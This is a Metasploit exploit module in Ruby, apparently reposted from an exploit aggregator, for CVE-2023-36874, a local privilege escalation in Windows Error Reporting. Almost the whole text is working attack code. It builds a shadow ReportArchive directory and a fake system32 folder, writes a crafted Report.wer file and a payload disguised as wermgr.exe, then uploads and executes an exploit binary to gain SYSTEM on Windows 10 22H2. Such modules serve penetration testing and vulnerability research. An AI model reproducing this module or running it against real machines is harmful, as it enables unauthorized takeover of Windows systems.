Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-WINDOWS-LOCAL-WIN_ERROR_CVE_2023_36874-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',
        'Description' => %q{
          This module takes advantage of a bug in the way Windows error reporting opens the report
          parser.  If you open a report, Windows uses a relative path to locate the rendering program.
          By creating a specific alternate directory structure, we can coerce Windows into opening an
          arbitrary executable as SYSTEM.
          If the current user is a local admin, the system will attempt impersonation and the exploit will
          fail.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Filip Dragović (Wh04m1001)', # PoC
          'Octoberfest7', # PoC
          'bwatters-r7' # msf module
        ],
        'Platform' => ['win'],
        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
        'Targets' => [
          [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-07-11',
        'References' => [
          ['CVE', '2023-36874'],
          ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],
          ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],
          ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    register_options([
      OptString.new('EXPLOIT_NAME',
                    [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
      OptString.new('REPORT_DIR',
                    [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
      OptString.new('SHADOW_DRIVE',
                    [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
      OptInt.new('EXECUTE_DELAY',
                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])
    ])
  end

  # When we pass the directory value to the mkdir method, the mkdir method
  # passes the reference to the string containing the directory.
  # We do a lot of string manipulation in this module, so this is a quick
  # hack to make sure that despite what we do with the string after we create
  # the directory, it is  the actual directory we created that gets sent to
  # the cleanup methods.
  def clone_mkdir(dir)
    mkdir(dir.clone)
  end

  def upload_error_report
    wer_archive_dir = get_env('PROGRAMDATA')
    vprint_status(wer_archive_dir)
    wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
    report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"
    report_filename = "#{report_dir}\\Report.wer"
    vprint_status("Creating #{report_dir}")
    clone_mkdir(report_dir)
    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
    vprint_status("Writing Report to #{report_filename}")
    write_file(report_filename, wer_report_data)
  end

  def build_shadow_archive_dir(shadow_base_dir)
    wer_archive_dir = shadow_base_dir
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << '\\ProgramData\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'Microsoft\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'Windows\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'WER\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'ReportArchive\\'
    clone_mkdir(wer_archive_dir)
    report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"
    clone_mkdir(report_dir)
    return report_dir
  end

  def upload_shadow_report(shadow_archive_dir)
    report_filename = "#{shadow_archive_dir}\\Report.wer"
    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
    vprint_status("Writing bad Report to #{report_filename}")
    write_file(report_filename, wer_report_data)
  end

  def build_shadow_system32(shadow_base_dir)
    shadow_win32 = "#{shadow_base_dir}\\system32"
    vprint_status("Creating #{shadow_win32}")
    clone_mkdir(shadow_win32)
    return shadow_win32
  end

  def upload_payload(shadow_win32)
    payload_bin = generate_payload_exe
    payload_filename = "#{shadow_win32}\\wermgr.exe"
    vprint_status("Writing payload to #{payload_filename}")
    write_file(payload_filename, payload_bin)
  end

  def upload_execute_exploit(exploit_path, shadow_path, home_dir)
    vprint_status("shadow_path = #{shadow_path}")
    exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
    write_file(exploit_path, exploit_bin)
    sleep datastore['EXECUTE_DELAY']
    vprint_status("Exploit uploaded to #{exploit_path}")
    cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"
    output = cmd_exec(cmd, nil, 30)
    vprint_status(output)
  end

  def check
    # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.
    version = get_version_info
    vprint_status("OS version: #{version}")
    return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2

    return Exploit::CheckCode::Safe
  end

  def exploit
    fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?
    fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?
    shadow_dir = datastore['SHADOW_DRIVE']
    home_dir = get_env('HOMEDRIVE')
    shadow_path = "#{home_dir}\\#{shadow_dir}"
    vprint_status("Shadow Path = #{shadow_path}")
    upload_error_report
    shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)
    upload_shadow_report(shadow_archive_dir)
    shadow_system32 = build_shadow_system32(shadow_path.dup)
    upload_payload(shadow_system32)
    sleep datastore['EXECUTE_DELAY']
    exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"
    exploit_path << '.exe' unless exploit_path[-4..] == '.exe'
    if shadow_dir.length > 64
      fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')
    end
    upload_execute_exploit(exploit_path, shadow_dir, home_dir)
    print_warning("Manual deletion of #{shadow_path} may be required")
  end
end